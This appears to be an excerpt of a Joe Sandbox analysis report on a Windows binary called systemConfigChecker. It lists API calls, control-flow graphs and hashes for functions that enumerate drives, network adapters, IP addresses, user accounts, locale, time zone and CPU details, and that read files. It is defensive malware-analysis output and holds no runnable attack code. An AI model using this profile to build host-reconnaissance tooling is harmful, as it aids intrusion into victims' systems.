          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: U?$char_traits@$D@std@@@std@@$InfoLocale_invalid_parameter_noinfo_noreturn$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@D@std@@@1@_V?$basic_streambuf@memcpymemset
          • String ID: Country: $Failed to get locale$Language:
          • API String ID: 3095796567-568146128
          • Opcode ID: 7904306417eea5db5be8cc27ab08f575789e8ddbba3484a0836349cafbead015
          • Instruction ID: d1f4ca3158287622d9f0e84057b119b3b86ad2c8abc8df7cacfaae340a14ec6e
          • Opcode Fuzzy Hash: 7904306417eea5db5be8cc27ab08f575789e8ddbba3484a0836349cafbead015
          • Instruction Fuzzy Hash: C1B1C172B18B8185EB11CF68D4503AE33A0FB86B98F505236DB5C93B98DFB9D189C704

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1085 7ff6b2703780-7ff6b27037fc GetLogicalDrives memset call 7ff6b2706810 call 7ff6b27099f0 1090 7ff6b2703800-7ff6b270380e 1085->1090 1091 7ff6b2703814-7ff6b2703890 call 7ff6b2709610 1090->1091 1092 7ff6b270397a-7ff6b2703981 1090->1092 1098 7ff6b27038c4-7ff6b27038fe GetDiskFreeSpaceExA 1091->1098 1099 7ff6b2703892-7ff6b27038a4 1091->1099 1092->1090 1093 7ff6b2703987-7ff6b27039b4 1092->1093 1095 7ff6b27039e5-7ff6b27039e8 1093->1095 1096 7ff6b27039b6-7ff6b27039c0 1093->1096 1101 7ff6b2703a0c-7ff6b2703a11 1095->1101 1102 7ff6b27039ea-7ff6b27039f4 1095->1102 1096->1095 1100 7ff6b27039c2-7ff6b27039d5 1096->1100 1105 7ff6b2703941-7ff6b270394a 1098->1105 1106 7ff6b2703900-7ff6b2703940 call 7ff6b2709820 call 7ff6b27099f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z call 7ff6b27099f0 1098->1106 1103 7ff6b27038bf call 7ff6b270b500 1099->1103 1104 7ff6b27038a6-7ff6b27038b9 1099->1104 1107 7ff6b2703a16-7ff6b2703a19 1100->1107 1101->1107 1102->1101 1108 7ff6b27039f6-7ff6b2703a0a 1102->1108 1103->1098 1104->1103 1109 7ff6b27039d7-7ff6b27039dd _invalid_parameter_noinfo_noreturn 1104->1109 1105->1092 1114 7ff6b270394c-7ff6b270395e 1105->1114 1106->1105 1112 7ff6b2703a24-7ff6b2703a96 call 7ff6b2707c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6b270b4e0 1107->1112 1113 7ff6b2703a1b-7ff6b2703a23 call 7ff6b27096c0 1107->1113 1108->1107 1116 7ff6b27039de-7ff6b27039e4 _invalid_parameter_noinfo_noreturn 1109->1116 1113->1112 1119 7ff6b2703975 call 7ff6b270b500 1114->1119 1120 7ff6b2703960-7ff6b2703973 1114->1120 1116->1095 1119->1092 1120->1116 1120->1119
          APIs
          • GetLogicalDrives.KERNELBASE ref: 00007FF6B27037C5
          • memset.VCRUNTIME140 ref: 00007FF6B27037DA
            • Part of subcall function 00007FF6B2706810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B270684A
            • Part of subcall function 00007FF6B2706810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6B2706866
            • Part of subcall function 00007FF6B2706810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B2706898
            • Part of subcall function 00007FF6B27099F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A69
            • Part of subcall function 00007FF6B27099F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A89
            • Part of subcall function 00007FF6B27099F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A99
            • Part of subcall function 00007FF6B27099F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B7C
            • Part of subcall function 00007FF6B27099F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B83
            • Part of subcall function 00007FF6B27099F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B90
          • GetDiskFreeSpaceExA.KERNELBASE ref: 00007FF6B27038F6
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF6B270392B
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B27039D7
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B27039DE
          • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2703A59
          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2703A63
            • Part of subcall function 00007FF6B2709610: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF6B2701CCF), ref: 00007FF6B2709656
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: U?$char_traits@$D@std@@@std@@$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@_invalid_parameter_noinfo_noreturn$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@??6?$basic_ostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?uncaught_exception@std@@D@std@@@1@@DiskDrivesFreeLogicalOsfx@?$basic_ostream@_SpaceV01@_V12@V?$basic_streambuf@memcpymemset
          • String ID: GB$Available Drives:
          • API String ID: 2435906160-4081138596
          • Opcode ID: c8601fb43c653ddf6b0af4f5e75bc3de50e7d25d23a1f5c1362283a91e556e70
          • Instruction ID: d3337fc42db6ba32ddd51f796083f825bef623d26b56cc2da223febedf237827
          • Opcode Fuzzy Hash: c8601fb43c653ddf6b0af4f5e75bc3de50e7d25d23a1f5c1362283a91e556e70
          • Instruction Fuzzy Hash: 9A91D662A18B8186EB11CB69D4403AE77A0FB8679CF505231DF8D837A5DFBDD189C708

          Control-flow Graph

          APIs
          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6B2703AEB
          • memset.VCRUNTIME140 ref: 00007FF6B2703B01
            • Part of subcall function 00007FF6B2706810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B270684A
            • Part of subcall function 00007FF6B2706810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6B2706866
            • Part of subcall function 00007FF6B2706810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B2706898
          • GetAdaptersInfo.IPHLPAPI ref: 00007FF6B2703B19
          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6B2703B28
          • GetAdaptersInfo.IPHLPAPI ref: 00007FF6B2703B39
          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6B2703BC0
          • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2703C8E
          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2703C98
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: U?$char_traits@$D@std@@@std@@$AdaptersInfomalloc$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@V?$basic_streambuf@freememset
          • String ID: Adapter: $IP Address:
          • API String ID: 1136092572-1613687433
          • Opcode ID: 06b27aec4c232e626f636c09154849647e9ee1243f3ad1ae019303bbe33ba379
          • Instruction ID: 56e69e36e491ddf51aab24e4f22dab318e177ecb993f16db212333f6218249cc
          • Opcode Fuzzy Hash: 06b27aec4c232e626f636c09154849647e9ee1243f3ad1ae019303bbe33ba379
          • Instruction Fuzzy Hash: 1D51B362A19B8182EB12DB19D4402AF73A1FB86B88F404132DF4D87B55DFBDD48AC708

          Control-flow Graph

          APIs
          • GetSystemInfo.KERNELBASE ref: 00007FF6B270359E
          • memset.VCRUNTIME140 ref: 00007FF6B27035B0
            • Part of subcall function 00007FF6B2706810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B270684A
            • Part of subcall function 00007FF6B2706810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6B2706866
            • Part of subcall function 00007FF6B2706810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B2706898
            • Part of subcall function 00007FF6B27099F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A69
            • Part of subcall function 00007FF6B27099F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A89
            • Part of subcall function 00007FF6B27099F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709A99
            • Part of subcall function 00007FF6B27099F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B7C
            • Part of subcall function 00007FF6B27099F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B83
            • Part of subcall function 00007FF6B27099F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B90
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z.MSVCP140 ref: 00007FF6B27035D7
            • Part of subcall function 00007FF6B27099F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709AE6
            • Part of subcall function 00007FF6B27099F0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B0F
            • Part of subcall function 00007FF6B27099F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6B27019FA), ref: 00007FF6B2709B36
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6B2703603
          • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B27036DC
          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B27036E6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: U?$char_traits@$D@std@@@std@@$U?$char_traits@_W@std@@@std@@$??6?$basic_ostream@?good@ios_base@std@@?sputc@?$basic_streambuf@V01@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@1@@InfoOsfx@?$basic_ostream@_SystemV12@V?$basic_streambuf@memset
          • String ID: Number of Cores: $Processor Architecture:
          • API String ID: 777187999-1490948189
          • Opcode ID: db8688cd583bdc27e0cdb5cc254e17eb9a2918b1e2afa49accf7bbecb9bde412
          • Instruction ID: b19259dea02a88acc9d09b40a41f00966f3ade024173c6686a733a72f1a10307
          • Opcode Fuzzy Hash: db8688cd583bdc27e0cdb5cc254e17eb9a2918b1e2afa49accf7bbecb9bde412
          • Instruction Fuzzy Hash: C351A062A14A818AEB11CF69D8502EE33B0FB8AB8CF404136DB4D97769DF7DD149C744
          APIs
          • memset.VCRUNTIME140 ref: 00007FF6B2703D2C
            • Part of subcall function 00007FF6B2706810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B270684A
            • Part of subcall function 00007FF6B2706810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6B2706866
            • Part of subcall function 00007FF6B2706810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B2706898
          • NetUserEnum.NETAPI32 ref: 00007FF6B2703D6B
          • NetApiBufferFree.NETAPI32 ref: 00007FF6B2703E4A
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2703E9F
          • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2703F1A
          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2703F24
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@BufferD@std@@@1@@EnumFreeUserV?$basic_streambuf@_invalid_parameter_noinfo_noreturnmemset
          • String ID: User:
          • API String ID: 429987867-381282118
          • Opcode ID: a64873103b06ffc4200cda270a07e11e7e197258626d2288af55902c3a0a6a1e
          • Instruction ID: 75b77c8a8ff16809f571433cb3b78fd53850b72d7797a89fd66afdb45d7e9666
          • Opcode Fuzzy Hash: a64873103b06ffc4200cda270a07e11e7e197258626d2288af55902c3a0a6a1e
          • Instruction Fuzzy Hash: 0771C572A18B8186EB11CF69D4402AE77E1FB86788F504136DB4D93BA8DF7DD489C708
          APIs
          • GetTimeZoneInformation.KERNELBASE ref: 00007FF6B27041BD
          • memset.VCRUNTIME140 ref: 00007FF6B27041D0
            • Part of subcall function 00007FF6B2706810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B270684A
            • Part of subcall function 00007FF6B2706810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6B2706866
            • Part of subcall function 00007FF6B2706810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B2706898
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B270427D
          • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2704351
          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B270435B
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@InformationTimeV?$basic_streambuf@Zone_invalid_parameter_noinfo_noreturnmemset
          • String ID: Time Zone:
          • API String ID: 35776714-1239252231
          • Opcode ID: 9680c93f22244c1f102b1dcea7ae030f4aea4ed922c954592cfa34c9f968cfaf
          • Instruction ID: 37965556c52621a150437bd2ae6cd865aa351054474986f07d622e4f580f2127
          • Opcode Fuzzy Hash: 9680c93f22244c1f102b1dcea7ae030f4aea4ed922c954592cfa34c9f968cfaf
          • Instruction Fuzzy Hash: FB51F272A18B8581EB21CF68E4502AF73A1FB8A798F505132EB4D83759DFBDD489C704

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 933 7ff6b2701820-7ff6b270186f memset 934 7ff6b2701874-7ff6b27018ae call 7ff6b27089e0 933->934 935 7ff6b2701871 933->935 938 7ff6b27018b0-7ff6b2701901 call 7ff6b27099f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 934->938 939 7ff6b2701906-7ff6b2701941 ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z 934->939 935->934 949 7ff6b2701a7e-7ff6b2701ac6 call 7ff6b2707530 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6b270b4e0 938->949 941 7ff6b2701943-7ff6b2701950 939->941 942 7ff6b27019b8-7ff6b27019bd 939->942 945 7ff6b2701acd-7ff6b2701b3a call 7ff6b270b060 call 7ff6b2707530 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ 941->945 946 7ff6b2701956-7ff6b270195d 941->946 943 7ff6b27019c2-7ff6b27019e5 ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z ??7ios_base@std@@QEBA_NXZ 942->943 947 7ff6b2701a52-7ff6b2701a59 943->947 948 7ff6b27019e7-7ff6b2701a18 call 7ff6b27099f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 943->948 951 7ff6b270195f-7ff6b2701966 946->951 952 7ff6b2701988-7ff6b2701990 call 7ff6b270b508 946->952 957 7ff6b2701a5d-7ff6b2701a7a 947->957 948->957 969 7ff6b2701a1a-7ff6b2701a27 948->969 955 7ff6b270196c call 7ff6b270b508 951->955 956 7ff6b2701ac7-7ff6b2701acc call 7ff6b2701270 951->956 966 7ff6b2701993-7ff6b27019b6 memset 952->966 971 7ff6b2701971-7ff6b2701974 955->971 956->945 957->949 966->943 973 7ff6b2701a45-7ff6b2701a50 call 7ff6b270b500 969->973 974 7ff6b2701a29-7ff6b2701a3c 969->974 975 7ff6b2701a3e-7ff6b2701a44 _invalid_parameter_noinfo_noreturn 971->975 976 7ff6b270197a-7ff6b2701986 971->976 973->957 974->973 974->975 975->973 976->966
          APIs
          • memset.VCRUNTIME140 ref: 00007FF6B2701865
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6B27018CD
          • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ.MSVCP140 ref: 00007FF6B2701910
          • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z.MSVCP140 ref: 00007FF6B2701927
          • memset.VCRUNTIME140 ref: 00007FF6B27019A9
            • Part of subcall function 00007FF6B270B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6B270107B), ref: 00007FF6B270B522
          • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z.MSVCP140 ref: 00007FF6B27019CD
          • ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6B27019DD
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6B2701A04
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6B2701A3E
          • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2701A8D
          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2701A97
          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B2701AC7
          • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6B2701B2C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: D@std@@@std@@U?$char_traits@$V01@$??1?$basic_istream@??6?$basic_ostream@V01@@memset$??1?$basic_ios@??7ios_base@std@@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@Concurrency::cancel_current_taskMbstatet@@@2@V12@V12@_V?$fpos@_invalid_parameter_noinfo_noreturnmalloc
          • String ID: Couldn't open the file$Couldn't read the file
          • API String ID: 2898521299-2967168750
          • Opcode ID: 8854638d1394e1158c67c410b5d485f915181e4be3706a2316ebb181cbf7b6c2
          • Instruction ID: ca85312f901b5138242ea67ba224e53244141cf68869d8f66fe4d31102f02211
          • Opcode Fuzzy Hash: 8854638d1394e1158c67c410b5d485f915181e4be3706a2316ebb181cbf7b6c2
          • Instruction Fuzzy Hash: FE91A032A18B8582EB11CF19E8402AE73A1FB86B98F544632DF5D837A4DF7DE149C704

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1035 7ff6b2701520-7ff6b2701617 call 7ff6b270c374 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z 1038 7ff6b2701621 1035->1038 1039 7ff6b2701619-7ff6b270161f 1035->1039 1040 7ff6b2701624-7ff6b2701631 1038->1040 1039->1040 1041 7ff6b27016bf-7ff6b27016ec 1040->1041 1042 7ff6b2701637 1040->1042 1043 7ff6b2701710-7ff6b2701713 1041->1043 1044 7ff6b27016ee-7ff6b27016f8 1041->1044 1045 7ff6b2701640-7ff6b2701650 isalnum 1042->1045 1047 7ff6b2701715-7ff6b270171f 1043->1047 1048 7ff6b2701738-7ff6b270173d 1043->1048 1044->1043 1046 7ff6b27016fa-7ff6b270170e 1044->1046 1049 7ff6b27016a3-7ff6b27016ab call 7ff6b2709820 1045->1049 1050 7ff6b2701652-7ff6b2701657 1045->1050 1052 7ff6b2701742-7ff6b2701745 1046->1052 1047->1048 1053 7ff6b2701721-7ff6b2701736 1047->1053 1048->1052 1057 7ff6b27016b0-7ff6b27016b6 1049->1057 1050->1049 1054 7ff6b2701659-7ff6b270165c 1050->1054 1055 7ff6b2701750-7ff6b27017bb call 7ff6b2707c10 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6b270b4e0 1052->1055 1056 7ff6b2701747-7ff6b270174a call 7ff6b27096c0 1052->1056 1053->1052 1054->1049 1058 7ff6b270165e-7ff6b2701661 1054->1058 1064 7ff6b270174f 1056->1064 1057->1045 1061 7ff6b27016b8 1057->1061 1058->1049 1062 7ff6b2701663-7ff6b27016a1 ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z call 7ff6b2709820 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z 1058->1062 1061->1041 1062->1057 1064->1055
          APIs
          • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B270157F
          • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6B270159E
          • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6B27015D2
          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF6B2701609
          • isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6B2701648
